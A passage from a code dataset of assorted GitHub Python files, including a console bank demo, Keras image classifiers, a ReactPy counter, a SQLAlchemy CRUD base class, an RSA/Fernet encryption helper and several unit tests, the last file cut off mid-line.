ref_code,\n \"ref_code_seq\": ref_code_seq,\n \"ena_accession_number_sample\": eans[0],\n \"ena_accession_number_project\": eans[1],\n \"ena_accession_number_umbrella\": eans[2],\n \"biosamples_accession_number\": eans[3]\n },\n ignore_index=True\n )\n df_ena.to_csv(ena_csv_path, index=False)\n logger.info(f\"ENA accession numbers generated for {smi} ({ref_code})\")\n else:\n logger.info(f\"No ENA accession numbers generated for {smi} ({ref_code})\")\n","repo_name":"emo-bon/ena-sample-registration-action","sub_path":"action.py","file_name":"action.py","file_ext":"py","file_size_in_byte":10769,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"10338085235","text":"def account(accno,accname,accpin,balance):\n print(\"Your account Information\")\n print(\"Account Number:\",accno)\n print(\"Accountant Name:\",accname)\n print(\"Account Pin:\",accpin)\n print(\"Balance:\",balance)\n print(\"\\n \\n Click the options\")\n i=0\n while i<=3:\n choice=int(input(\"1. Deposit\\n 2. Withdraw\\n 3.Check Balance \"))\n if choice==1:\n deposit=int(input(\"Enter the deposit amount:\"))\n if deposit>=100:\n balance=balance+deposit\n print(\"Thank you for deposition !\")\n print(\"Total amount:\",balance)\n else:\n print(\"Please deposit more than 100 Rs\")\n elif(choice==2):\n withdrawamt=int(input(\"Enter the withdraw amount:\"))\n if withdrawamt>=100:\n balance-=withdrawamt\n print(\"You have successfully withdrawn Rs\",withdrawamt)\n print(\"Total amount:\",balance)\n else:\n print(\"Please withdraw more than 100 Rs\")\n elif(choice==3):\n print(\"Total amount:\",balance)\n else:\n print(\"Invalid Choice!\")\n i+=1\n\nacno=input(\"Enter the Account Number:\")\nacname=input(\"Enter Accountant name: \")\nacpin=input(\"Enter Account pin: \")\nbalance=0\n\naccount(acno,acname,acpin,balance)\n","repo_name":"Ash515/Transaction-Service","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1243,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"} +{"seq_id":"10589914805","text":"from keras.preprocessing.image import ImageDataGenerator\r\nfrom keras.models import Sequential\r\nfrom keras.layers import Convolution2D, MaxPooling2D\r\nfrom keras.layers import Activation, Dropout, Flatten, Dense\r\n\r\n\r\nmodel = Sequential()\r\nmodel.add(Convolution2D(nb_filter=32, nb_row=3,\r\n nb_col=3, input_shape=(3, 150, 150)))\r\nmodel.add(Activation('relu'))\r\nmodel.add(MaxPooling2D(pool_size=(2, 2)))\r\n\r\nmodel.add(Convolution2D(32, 3, 3))\r\nmodel.add(Activation('relu'))\r\nmodel.add(MaxPooling2D(pool_size=(2, 2)))\r\n\r\nmodel.add(Convolution2D(nb_filter=64, nb_row=3, nb_col=3))\r\nmodel.add(Activation('relu'))\r\nmodel.add(MaxPooling2D(pool_size=(2, 2)))\r\n\r\n# o model ate agora, tem como outputs mapas de funcionalidade 3d (height, width, features)\r\n# converte nossos mapas de recursos 3D em vetores de recursos 1D\r\nmodel.add(Flatten())\r\nmodel.add(Dense(64)) # 64 neurons\r\nmodel.add(Activation('relu'))\r\nmodel.add(Dropout(0.5)) # Faz um drop de 50% dos neurons\r\n\r\n# Camada de saida: Classifica os dez estados do motorista\r\nmodel.add(Dense(10))\r\nmodel.add(Activation('softmax'))\r\n\r\n# Compila o model\r\nmodel.compile(loss='categorical_crossentropy',\r\n optimizer='adadelta', metrics=['accuracy'])\r\n\r\n# Config de aumento para gerar training data\r\ntrain_datagen = ImageDataGenerator(\r\n rescale=1.0/255, shear_range=0.2, zoom_range=0.2, horizontal_flip=True)\r\n\r\n# a validação de imagem esta escalada em 1/255, nenhum outro aumento para nossa validacao de dados\r\ntest_datagen = ImageDataGenerator(rescale=1.0/255)\r\n\r\n\r\n# esse é o gerador que ira ler imagens en contradas em sub pastas de 'data/train',\r\n# e indefinitivamente gera batch de dados de imagem aumentados!\r\ntrain_generator = train_datagen.flow_from_directory('data/train', target_size=(150, 150),\r\n batch_size=32, class_mode='categorical')\r\n\r\n# Este é o gerador de dados de validação\r\nvalidation_generator = test_datagen.flow_from_directory('data/validation', target_size=(150, 150),\r\n batch_size=32, class_mode='categorical')\r\n\r\n# trainando convolutional neural network\r\nmodel.fit_generator(train_generator, samples_per_epoch=20924, nb_epoch=20,\r\n validation_data=validation_generator, nb_val_samples=800)\r\n\r\n# Salvando os weights\r\nmodel.save_weights('driver_state_detection_small_CNN.h5')\r\n","repo_name":"caiocobacho/deeplearning4driver","sub_path":"driver_distraido.py","file_name":"driver_distraido.py","file_ext":"py","file_size_in_byte":2409,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"29435624409","text":"from reactpy import component, html, run, hooks\n\n@component\ndef hello_world():\n return html.h1(\"Hello, World!\")\n\n@component\ndef Photo():\n\n def handle_photo_click():\n print(\"Photo clicked.\")\n\n return html.button(\n { \"on_click\": handle_photo_click() },\n html.img(\n {\n \"src\": \"https://picsum.photos/id/456/500/300\",\n \"style\": {\"width\": \"50%\"},\n \"alt\": \"Puppy\",\n \"on_click\": handle_photo_click()\n }\n ),\n )\n\n\ndef increment(last_count):\n return last_count + 1\n\n\ndef decrement(last_count):\n return last_count - 1\n\n\n@component\ndef Counter():\n initial_count = 0\n count, set_count = hooks.use_state(initial_count)\n return html.div(\n html.div(\n hello_world()\n ),\n html.br(),\n f\"Count: {count}\",\n html.br(),\n html.button(\n {\"on_click\": lambda event: set_count(initial_count)}, \"Reset\"\n ),\n html.br(),\n html.div(\n {\"style\": \n {\"backgroundColor\": \"blue\", \"height\": \"80px\"},\n \"children\": [\"nested...\", \"nested2...\"]\n }\n ),\n html.button({\"on_click\": lambda event: set_count(increment)}, \"+\"),\n html.button({\"on_click\": lambda event: set_count(decrement)}, \"-\"),\n Photo()\n )\n\nrun(Counter)","repo_name":"bmetenko/Tinkering","sub_path":"py/reactpy_main.py","file_name":"reactpy_main.py","file_ext":"py","file_size_in_byte":1359,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"43455008641","text":"# -*- coding: utf-8 -*-\nimport os\n\nfrom gtts import gTTS\nimport speech_recognition as sr\n\n\ndef record_audio():\n r = sr.Recognizer()\n with sr.Microphone() as source:\n print(\"Say something!\")\n audio = r.listen(source)\n data = None\n try:\n data = str(r.recognize_google(audio))\n except sr.UnknownValueError:\n print(\"Google Speech Recognition could not understand audio\")\n except sr.RequestError as e:\n print(\n \"Could not request results from Google Speech Recognition service; {0}\".format(e))\n return data or \"\"\n\n\ndef speak(audio_string):\n print(audio_string)\n tts = gTTS(text=audio_string, lang='en')\n tts.save(\"here.mp3\")\n os.system(\"mpg123 here.mp3\")\n","repo_name":"Shrey-Patel/Pybot","sub_path":"pybotcli/packages/audioHandler.py","file_name":"audioHandler.py","file_ext":"py","file_size_in_byte":729,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"2656284360","text":"from typing import Any, Generic, List, Optional, Type, TypeVar\n\nimport sqlalchemy\nfrom pydantic import BaseModel\nfrom sqlalchemy.orm import Session\nfrom starlette.exceptions import HTTPException\n\nfrom app.main.database.db import Base\n\nModelType = TypeVar(\"ModelType\", bound=Base)\nCreateSchemaType = TypeVar(\"CreateSchemaType\", bound=BaseModel)\nUpdateSchemaType = TypeVar(\"UpdateSchemaType\", bound=BaseModel)\n\n\nclass CRUDBase(Generic[ModelType, CreateSchemaType, UpdateSchemaType]):\n def __init__(self, model: Type[ModelType]):\n \"\"\"\n Base Service for CRUD Operation´s like READ, UPDATE, DELETE AND CREATE\n\n\n :param model: model which is used.\n \"\"\"\n self.model = model\n\n def get(self, db_session: Session, id: Any) -> Optional[ModelType]:\n \"\"\"\n Get´s a specific object from the database\n\n\n :param db_session: Current Session.\n :param id: Identifier for the object, which is going to be searched.\n :return: Found Object\n \"\"\"\n return db_session.query(self.model).filter(self.model.id == id).first()\n\n def list(self, db_session: Session) -> List[ModelType]:\n \"\"\"\n Query´s everything for the specific Object Type\n\n :param db_session: Current Session.\n :return: List of Objects\n \"\"\"\n objs: List[ModelType] = db_session.query(self.model).all()\n return objs\n\n def create(self, obj: CreateSchemaType, db_session: Session) -> ModelType:\n \"\"\"\n Create´s an object in the database.\n\n :param db_session: Current Session.\n :param obj: Object which is going to be created in the database.\n :return: Created Object\n \"\"\"\n db_obj: ModelType = self.model(**obj.dict())\n db_session.add(db_obj)\n try:\n db_session.commit()\n except sqlalchemy.exc.IntegrityError as e:\n db_session.rollback()\n if \"duplicate key\" in str(e):\n raise HTTPException(status_code=409, detail=\"Conflict Error\")\n else:\n raise e\n return db_obj\n\n def update(self, object_id: Any, obj: UpdateSchemaType, db_session: Session, ) -> Optional[ModelType]:\n \"\"\"\n Update´s a specific Object in the database.\n\n :param object_id: Identifier of the object which is going to be updated\n :param obj: Data of the updated Object\n :return: Updated Object.\n \"\"\"\n db_obj = self.get(object_id)\n for column, value in obj.dict(exclude_unset=True).items():\n setattr(db_obj, column, value)\n db_session.commit()\n return db_obj\n\n def delete(self, object_id: Any, db_session: Session) -> None:\n \"\"\"\n Delete´s a specific Object by its Identifier\n\n :param object_id: Identifier of the Object which is going to be deleted\n :return:\n \"\"\"\n\n db_obj = db_session.query(self.model).get(object_id)\n db_session.delete(db_obj)\n db_session.commit()\n","repo_name":"mamotec/MaMoTecEnergy","sub_path":"app/main/crud/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":3008,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"43979114785","text":"import rsa\r\nfrom cryptography.fernet import Fernet\r\n\r\n\r\ndef Encryption(message):\r\n \r\n #open the message key\r\n skey =open('message.key','rb')\r\n key=skey.read()\r\n \r\n #create chipher\r\n chipher = Fernet(key)\r\n \r\n \r\n #write encrypt data\r\n encrypt_data =chipher.encrypt(bytes(message,'utf-8'))\r\n edata = open(\"EncryptedFiles\",\"wb\")\r\n edata.write(encrypt_data)\r\n \r\n public_key= open('public_key.key','rb')\r\n pubKey=public_key.read()\r\n \r\n #encrypt the data\r\n pukey= rsa.PublicKey.load_pkcs1(pubKey)\r\n encrypt_data = rsa.encrypt(key,pukey)\r\n \r\n #write encrypt data\r\n edata = open(\"Encryptedkey\",\"wb\")\r\n edata.write(encrypt_data)\r\n","repo_name":"DinethJaay/Data-Encryption-and-Data-Decryption-Using-Python","sub_path":"day3/encryptionData.py","file_name":"encryptionData.py","file_ext":"py","file_size_in_byte":692,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"11839392910","text":"# This file is part of swprocess, a Python package for surface wave processing.\r\n# Copyright (C) 2020 Joseph P. Vantassel (joseph.p.vantassel@gmail.com)\r\n#\r\n# This program is free software: you can redistribute it and/or modify\r\n# it under the terms of the GNU General Public License as published by\r\n# the Free Software Foundation, either version 3 of the License, or\r\n# (at your option) any later version.\r\n#\r\n# This program is distributed in the hope that it will be useful,\r\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\r\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\r\n# GNU General Public License for more details.\r\n#\r\n# You should have received a copy of the GNU General Public License\r\n# along with this program. If not, see .\r\n\r\n\"\"\"Tests for Sensor1C.\"\"\"\r\n\r\nimport warnings\r\nimport logging\r\nfrom unittest.mock import MagicMock\r\n\r\nimport numpy as np\r\nimport obspy\r\n\r\nfrom swprocess import ActiveTimeSeries, Sensor1C\r\nfrom testtools import unittest, TestCase, get_path\r\n\r\nlogging.basicConfig(level=logging.ERROR)\r\n\r\n\r\nclass Test_Sensor1C(TestCase):\r\n\r\n @classmethod\r\n def setUpClass(cls):\r\n cls.path = get_path(__file__)\r\n cls.wghs_path = cls.path / \"../examples/masw/data/wghs/\"\r\n\r\n cls.a_amp = np.array([0, 1, 2, 1, 0, 1], dtype=np.double)\r\n cls.a_dt = 1.\r\n cls.tseries_a = ActiveTimeSeries(cls.a_amp, cls.a_dt)\r\n\r\n cls.b_amp = np.array([0, 1, 0, 1, 0, 1], dtype=np.double)\r\n cls.b_dt = 1.\r\n cls.tseries_b = ActiveTimeSeries(cls.b_amp, cls.b_dt)\r\n\r\n def test_init(self):\r\n # __init__\r\n sensor_1 = Sensor1C(self.a_amp, self.a_dt, 0, 0, 0)\r\n\r\n self.assertArrayEqual(self.a_amp, sensor_1.amplitude)\r\n self.assertEqual(self.a_dt, sensor_1.dt)\r\n\r\n # from_activetimeseries\r\n sensor_2 = Sensor1C.from_activetimeseries(self.tseries_a, 0, 0, 0)\r\n self.assertEqual(sensor_1, sensor_2)\r\n\r\n def test_from_trace(self):\r\n # seg2\r\n with warnings.catch_warnings():\r\n warnings.simplefilter(\"ignore\")\r\n traces = obspy.read(str(self.wghs_path / \"6.dat\"))\r\n trace = traces[0]\r\n sensor = Sensor1C.from_trace(trace)\r\n self.assertArrayEqual(trace.data, sensor.amplitude)\r\n self.assertEqual(trace.stats.delta, sensor.dt)\r\n x = float(trace.stats.seg2.RECEIVER_LOCATION)\r\n self.assertTupleEqual((x, 0., 0.),\r\n (sensor.x, sensor.y, sensor.z))\r\n self.assertEqual(float(trace.stats.seg2.DELAY), sensor.delay)\r\n self.assertEqual(int(trace.stats.seg2.STACK), sensor.nstacks)\r\n\r\n # su\r\n with warnings.catch_warnings():\r\n warnings.simplefilter(\"ignore\")\r\n traces = obspy.read(str(self.path / \"data/custom/shot1.su\"))\r\n trace = traces[0]\r\n sensor = Sensor1C.from_trace(trace)\r\n self.assertArrayEqual(trace.data, sensor.amplitude)\r\n self.assertEqual(trace.stats.delta, sensor.dt)\r\n header = trace.stats.su.trace_header\r\n scaleco = int(header[\"scalar_to_be_applied_to_all_coordinates\"])\r\n scaleco = abs(1/scaleco) if scaleco < 0 else scaleco\r\n x, y = [int(header[key]) *scaleco for key in [f\"group_coordinate_{c}\" for c in [\"x\", \"y\"]]]\r\n self.assertTupleEqual((x, y, 0.),\r\n (sensor.x, sensor.y, sensor.z))\r\n self.assertEqual(float(header[\"delay_recording_time\"]), sensor.delay)\r\n nstack_key = \"number_of_horizontally_stacked_traces_yielding_this_trace\"\r\n self.assertEqual(int(header[nstack_key])+1, sensor.nstacks)\r\n\r\n # read_header=False\r\n for cpath in [self.wghs_path / \"11.dat\", self.path /\"data/custom/shot1.su\"]:\r\n with warnings.catch_warnings():\r\n warnings.simplefilter(\"ignore\")\r\n traces = obspy.read(str(cpath))\r\n sensor = Sensor1C.from_trace(\r\n trace, read_header=False, nstacks=15, delay=-2, x=3, y=6, z=12)\r\n self.assertArrayEqual(trace.data, sensor.amplitude)\r\n self.assertEqual(trace.stats.delta, sensor.dt)\r\n self.assertEqual(15, sensor.nstacks)\r\n self.assertEqual(-2., sensor.delay)\r\n self.assertListEqual([3, 6, 12],\r\n [getattr(sensor, c) for c in [\"x\", \"y\", \"z\"]])\r\n\r\n # set trace.stats._format to integer so it raises ValueError\r\n mock_trace = MagicMock()\r\n mock_trace.stats._format = 1\r\n self.assertRaises(ValueError, Sensor1C.from_trace, mock_trace)\r\n\r\n def test_is_similar(self):\r\n a = Sensor1C(amplitude=[1.,2,3], dt=1., x=0, y=0, z=0, nstacks=1, delay=0)\r\n\r\n b = \"Not a Sensor1C\"\r\n c = Sensor1C(amplitude=[1.,2], dt=1., x=0, y=0, z=0, nstacks=1, delay=0)\r\n d = Sensor1C(amplitude=[1.,2,3], dt=2., x=0, y=0, z=0, nstacks=1, delay=0)\r\n e = Sensor1C(amplitude=[1.,2,3], dt=1., x=1, y=0, z=0, nstacks=1, delay=0)\r\n f = Sensor1C(amplitude=[1.,2,3], dt=1., x=0, y=1, z=0, nstacks=1, delay=0)\r\n g = Sensor1C(amplitude=[1.,2,3], dt=1., x=0, y=0, z=1, nstacks=1, delay=0)\r\n h = Sensor1C(amplitude=[1.,2,3], dt=1., x=0, y=0, z=0, nstacks=2, delay=0)\r\n i = Sensor1C(amplitude=[1.,2,3], dt=1., x=0, y=0, z=0, nstacks=1, delay=-0.5)\r\n\r\n j = Sensor1C(amplitude=[1.,2,3], dt=1., x=0, y=0, z=0, nstacks=1, delay=0)\r\n\r\n self.assertFalse(a._is_similar(b))\r\n self.assertFalse(a._is_similar(c))\r\n self.assertFalse(a._is_similar(d))\r\n self.assertFalse(a._is_similar(e))\r\n self.assertFalse(a._is_similar(f))\r\n self.assertFalse(a._is_similar(g))\r\n\r\n self.assertTrue(a._is_similar(c, exclude=[\"nsamples\"]))\r\n self.assertTrue(a._is_similar(d, exclude=[\"dt\"]))\r\n self.assertTrue(a._is_similar(e, exclude=[\"x\"]))\r\n self.assertTrue(a._is_similar(f, exclude=[\"y\"]))\r\n self.assertTrue(a._is_similar(g, exclude=[\"z\"]))\r\n self.assertTrue(a._is_similar(h, exclude=[\"nstacks\"]))\r\n self.assertTrue(a._is_similar(i, exclude=[\"delay\"]))\r\n self.assertTrue(a._is_similar(j))\r\n\r\n\r\nif __name__ == \"__main__\":\r\n unittest.main()\r\n","repo_name":"jpvantassel/swprocess","sub_path":"test/test_sensor1c.py","file_name":"test_sensor1c.py","file_ext":"py","file_size_in_byte":6248,"program_lang":"python","lang":"en","doc_type":"code","stars":38,"dataset":"github-code","pt":"37"} +{"seq_id":"5933489908","text":"import pytest\nfrom DynaSysML.Flow.shuffle import *\nfrom Tests.helper import *\nfrom Tests.ops import *\nfrom DynaSysML.core import get_parameter, index_select\nimport torch\nimport DynaSysML as dsl\n\n\n\n\ndef check_shuffling_flow(ctx,\n spatial_ndims: int,\n cls):\n num_features = 5\n\n for batch_shape in ([2], [2, 3]):\n shape = make_conv_shape(\n batch_shape, num_features, [6, 7, 8][: spatial_ndims])\n\n # test constructor\n flow = cls(num_features)\n assert(f'num_features={num_features}' in repr(flow))\n permutation = get_parameter(flow, 'permutation')\n inv_permutation = get_parameter(flow, 'inv_permutation')\n assert(torch.argsort(permutation) == inv_permutation).all()\n assert(torch.argsort(inv_permutation) == permutation).all()\n # flow = T.jit_compile(flow)\n\n # prepare for the answer\n x = torch.randn(shape)\n channel_axis = get_channel_axis(spatial_ndims)\n expected_y = index_select(x, permutation, axis=channel_axis)\n assert(\n index_select(expected_y, inv_permutation, axis=channel_axis) - x < 1e-6\n ).all()\n expected_log_det = torch.zeros(batch_shape)\n\n # check the flow\n flow_standard_check(ctx, flow, x, expected_y, expected_log_det,\n torch.randn(batch_shape))\n\n\nclass TestRearrangement(object):\n\n def test_FeatureShuffleFlow(self):\n check_shuffling_flow(self, 0, FeatureShufflingFlow)\n\n def test_FeatureShuffleFlowNd(self):\n for spatial_ndims in (1, 2, 3):\n check_shuffling_flow(\n self,\n spatial_ndims,\n getattr(dsl.Flow, f'FeatureShufflingFlow{spatial_ndims}d'),\n )\n","repo_name":"yantijin/DynaSysML","sub_path":"Tests/Flow/test_shuffle.py","file_name":"test_shuffle.py","file_ext":"py","file_size_in_byte":1784,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"37"} +{"seq_id":"33895055456","text":"#!/usr/bin/env python3\n\nimport time\nimport random\nimport threading\nimport os\nimport logging\n\nfrom prometheus_client import CollectorRegistry, Counter, push_to_gateway, Summary\nfrom mpi4py import MPI\ncomm = MPI.COMM_WORLD\nrank = comm.Get_rank()\n\nimport logging\nlogging.basicConfig(level=logging.DEBUG,\n format='(%(threadName)-10s) %(message)s',\n )\n\nregistry = CollectorRegistry()\n\n# Test Summary\ns = Summary('psana_wait_recv_ms', 'Waiting for something', registry=registry)\n@s.time()\ndef receive():\n time.sleep(2)\n\ndef push_metrics(e, registry):\n while not e.isSet():\n push_to_gateway('psdm03:9091', job='pushgateway', grouping_key={'pid': os.getpid()}, registry=registry)\n logging.debug('rank: %d (pid: %d) pushed %s'%(rank, os.getpid(), time.time()))\n time.sleep(5) \n\ndef test_send():\n # Test Counter\n if rank == 0:\n c = Counter('evts_transmit', 'events handed to big data nodes', ['unit'], registry=registry)\n else:\n c = Counter('evts_received', 'events received', ['unit'], registry=registry)\n\n if rank == 0:\n another_c = registry._names_to_collectors['evts_transmit_total']\n else:\n another_c = registry._names_to_collectors['evts_received_total']\n\n e = threading.Event()\n gw_thread = threading.Thread(target=push_metrics, args=(e, registry), daemon=True)\n gw_thread.start()\n\n cn = 0\n while True:\n if rank == 0:\n another_c.labels('evts').inc(1)\n another_c.labels('size').inc(100)\n else:\n another_c.labels('evts').inc(5)\n another_c.labels('size').inc(500)\n\n time.sleep(2)\n cn += 1\n logging.debug('cn=%d'%cn)\n \n receive()\n logging.debug('call receive def')\n\n #if cn == 30:\n # break\n\n logging.debug('exit')\n e.set()\n\nif __name__ == \"__main__\":\n logging.debug('test 1')\n test_send()\n #logging.debug('test 2')\n #test_send()\n","repo_name":"monarin/psana-nersc","sub_path":"psana2/prometheus/sent_to_pushdateway.py","file_name":"sent_to_pushdateway.py","file_ext":"py","file_size_in_byte":1959,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"25206358059","text":"\"\"\"\r\nVersion : 1.0 ( 06-16-2022).\r\n\r\nAuthor : Mbaye DIONGUE\r\n\r\nCopyright (C) 2019\r\n\r\nThis file is part of the codes provided at http://proximity-operator.net\r\n\r\nBy downloading and/or using any of these files, you implicitly agree to\r\nall the terms of the license CeCill-B (available online).\r\n\"\"\"\r\n\r\nimport numpy as np\r\n\r\n\r\nclass EpiSupport:\r\n r\"\"\"Compute the projection and the indicator of the epigraph of phi.\r\n\r\n Where phi is the function defined as:\r\n\r\n\r\n / * a * x if x < 0\r\n phi(y)= sigma_[a,b](y) = | 0 if x = 0\r\n \\ b * x otherwise\r\n\r\n\r\n When the inputs are arrays, the outputs are computed element-wise\r\n INPUTS\r\n ========\r\n y - ND array\r\n kxi - ND array with the same size as 'y'\r\n a - negative, scalar or ND array with the same size as x\r\n b - positive, scalar or ND array with the same size as x\r\n \"\"\"\r\n\r\n def __init__(\r\n self,\r\n ksi: np.ndarray,\r\n a: float or np.array = -1.0,\r\n b: float or np.array = 1.0\r\n ):\r\n if np.any(a > 0):\r\n raise ValueError(\"'a' (or all of its components ) must be negative\")\r\n if np.any(b < 0):\r\n raise ValueError(\"'b' (or all of its components ) must be positive\")\r\n if np.size(a) > 1 and (np.size(a) != np.size(ksi)):\r\n raise ValueError(\" 'a' must be a scalar or have the same size as 'ksi'\")\r\n if np.size(b) > 1 and (np.size(b) != np.size(ksi)):\r\n raise ValueError(\" 'b' must be a scalar or have the same size as 'ksi'\")\r\n if np.size(ksi) <= 1:\r\n ksi = np.reshape(ksi, (-1))\r\n self.a = a\r\n self.b = b\r\n self.ksi = ksi\r\n\r\n # proximal operator (i.e. the projection on the constraint set)\r\n def prox(self, y: np.ndarray) -> [np.ndarray, np.ndarray]:\r\n self._check(y)\r\n ksi = self.ksi\r\n a = self.a\r\n b = self.b\r\n if np.size(y) <= 1:\r\n y = np.reshape(y, (-1))\r\n\r\n # 4th branch\r\n prox_p = np.zeros(np.size(y))\r\n prox_t = np.zeros(np.size(y))\r\n\r\n # 3rd branch\r\n mask = np.logical_and(a * y > ksi, -y / a <= ksi)\r\n pp = (y + a * ksi) / (1 + a**2)\r\n tt = a * pp\r\n prox_p[mask] = pp[mask]\r\n prox_t[mask] = tt[mask]\r\n\r\n # 2nd branch\r\n mask = np.logical_and(b * y > ksi, -y / b <= ksi)\r\n pp = (y + b * ksi) / (1 + b**2)\r\n tt = b * pp\r\n prox_p[mask] = pp[mask]\r\n prox_t[mask] = tt[mask]\r\n\r\n # 1st branch\r\n mask = np.logical_and(a * y <= ksi, b * y <= ksi)\r\n prox_p[mask] = y[mask]\r\n prox_t[mask] = ksi[mask]\r\n return [prox_p, prox_t]\r\n\r\n # indicator of the constraint set\r\n def __call__(self, y) -> float:\r\n if np.all(self.a * y <= self.ksi) and np.all(self.b * y <= self.ksi):\r\n return 0\r\n return np.inf\r\n\r\n def _check(self, y):\r\n if np.size(y) != np.size(self.ksi):\r\n raise ValueError(\" 'y' must have the same size as 'ksi'\")\r\n","repo_name":"mbayediongue/proxop","sub_path":"src/proxop/indicator/EpiSupport.py","file_name":"EpiSupport.py","file_ext":"py","file_size_in_byte":3076,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"2502292623","text":"import logging\nfrom ludwig.api import LudwigModel\nfrom pandas import read_csv\nimport pandas as pd\n\ntrain_df_1 = read_csv(\"impressionism.csv\")\ntrain_df_2 = read_csv(\"post-impressionism.csv\")\ntrain_df_3 = read_csv(\"northern-renaissance.csv\")\n\n\nlabels = [\"Impressionism\", \"Post_Impressionism\", \"Northern_Renaissance\"]\ntrain_stats = {}\npreprocessed_data = {}\noutput_directory = {}\n# Constructs Ludwig model from config dictionary\nmodel = LudwigModel(config='config.yaml', logging_level=logging.DEBUG)\ntrain_df = {'Impressionism': train_df_1, 'Post_Impressionism': train_df_2, 'Northern_Renaissance': train_df_3}\n\nfor style in labels:\n temp = labels.copy()\n temp.remove(style)\n train_df_1 = train_df[style]\n train_df_2 = train_df[temp[0]]\n train_df_3 = train_df[temp[1]]\n min_images = 352\n train_df_1 = train_df_1.sample(n = min_images)\n train_df_2, train_df_3 = train_df_2.sample(n = int(min_images/2)), train_df_3.sample(n = int(min_images/2))\n dataframes = [train_df_1, train_df_2, train_df_3]\n train_df_2 = dataframes[1].replace(temp[0], \"Other\")\n train_df_3 = dataframes[2].replace(temp[1], \"Other\")\n \n result = pd.concat([train_df_1, train_df_2, train_df_3])\n\n # Trains the model. This cell might take a few minutes.\n train_stats[style], preprocessed_data[style], output_directory[style] = model.train(dataset=result,experiment_name=style)\n \n\n# # create Ludwig configuration dictionary\n# config = {\n# 'input_features': [\n# {\n# 'name': 'image_path',\n# 'type': 'image',\n# 'encoder': {\n# 'type': 'stacked_cnn',\n# }\n# }\n# ],\n# 'output_features': [{'name': 'label', 'type': 'category'}],\n# 'trainer': {'epochs': 5}\n# }\n\n\n\n# # Generates predictions and performance statistics for the test set.\n# test_stats, predictions, output_directory = model.evaluate(\n# train_df,\n# collect_predictions=True,\n# collect_overall_stats=True\n# )\n\n\n# confusion_matrix(\n# [test_stats],\n# model.training_set_metadata,\n# 'label',\n# top_n_classes=[5],\n# model_names=[''],\n# normalize=True,\n# )\n\n# # Visualizes learning curves, which show how performance metrics changed over\n# # time during training.\n# from ludwig.visualize import learning_curves\n\n# learning_curves(train_stats, output_feature_name='label')\n\n# predictions, output_directory = model.predict(train_df)","repo_name":"AndreeaEch657/Style-recognition","sub_path":"image_test.py","file_name":"image_test.py","file_ext":"py","file_size_in_byte":2357,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"18904694044","text":"\r\n# importing libraries\r\nimport os\r\n\r\nfrom keras.preprocessing.image import ImageDataGenerator\r\nfrom keras.models import Sequential\r\nfrom keras.layers import Conv2D, MaxPooling2D\r\nfrom keras.layers import Activation, Dropout, Flatten, Dense\r\nfrom keras import backend as K\r\n\r\n\r\nimg_width, img_height = 224, 224\r\n#insert dataset\r\ntrain_data_dir = 'treaning'\r\nvalidation_data_dir = 'test'\r\nnum_of_train_samples = 480+321+550\r\nnum_of_test_samples = 12+80+147\r\nepochs = 30\r\nbatch_size = 64\r\nnum_classes=3\r\n# check format of img if it's bainary it will be add 3 layers\r\nif K.image_data_format() == 'channels_first':\r\n\tinput_shape = (3, img_width, img_height)\r\nelse:\r\n\tinput_shape = (img_width, img_height, 3)\r\n# initial CNN \r\nclassify = Sequential()\r\nclassify.add(Conv2D(32, (3, 3), input_shape = input_shape))\r\nclassify.add(Activation('relu'))\r\nclassify.add(MaxPooling2D(pool_size =(2, 2)))\r\n\r\nclassify.add(Conv2D(32, (3, 3)))\r\nclassify.add(Activation('relu'))\r\nclassify.add(MaxPooling2D(pool_size =(2, 2)))\r\n\r\nclassify.add(Conv2D(64, (3, 3)))\r\nclassify.add(Activation('relu'))\r\nclassify.add(MaxPooling2D(pool_size =(2, 2)))\r\n\r\n\r\nclassify.add(Conv2D(128, (3, 3)))\r\nclassify.add(Activation('relu'))\r\nclassify.add(MaxPooling2D(pool_size =(2, 2)))\r\n\r\nclassify.add(Flatten())\r\nclassify.add(Dense(64))\r\nclassify.add(Activation('relu'))\r\nclassify.add(Dropout(0.5))# to avoid overfitting on the dataset.\r\nclassify.add(Dense(1))\r\nclassify.add(Dense(num_classes, activation='softmax'))\r\n# optimiz function to minimize the loss & suites for large data & little memo requirement\r\nclassify.compile(loss ='binary_crossentropy',\r\n\t\t\t\t\toptimizer ='rmsprop',\r\n\t\t\t\tmetrics =['accuracy'])\r\n# train& test dataset\r\ntrain_data = ImageDataGenerator(\r\n\t\t\t\trescale = 1. / 255,\r\n\t\t\t\tshear_range = 0.2,\r\n\t\t\t\tzoom_range = 0.2,\r\n\t\t\thorizontal_flip = True)\r\n\r\ntest_data = ImageDataGenerator(rescale = 1. / 255)\r\n\r\ntrain_generator = train_data.flow_from_directory(train_data_dir,\r\n\t\t\t\t\t\t\ttarget_size =(img_width, img_height),\r\n\t\t\t\t\tbatch_size = batch_size, class_mode ='categorical')\r\n\r\nvalidation_generator = test_data.flow_from_directory(\r\n\t\t\t\t\t\t\t\t\tvalidation_data_dir,\r\n\t\t\t\ttarget_size =(img_width, img_height),\r\n\t\tbatch_size = batch_size, class_mode ='categorical')\r\ntrain_generator.filenames\r\nclassify.fit_generator(train_generator,\r\n\tsteps_per_epoch = num_train_samples // batch_size,\r\n\tepochs = epochs, validation_data = validation_generator,\r\n\tvalidation_steps = num_validation_samples // 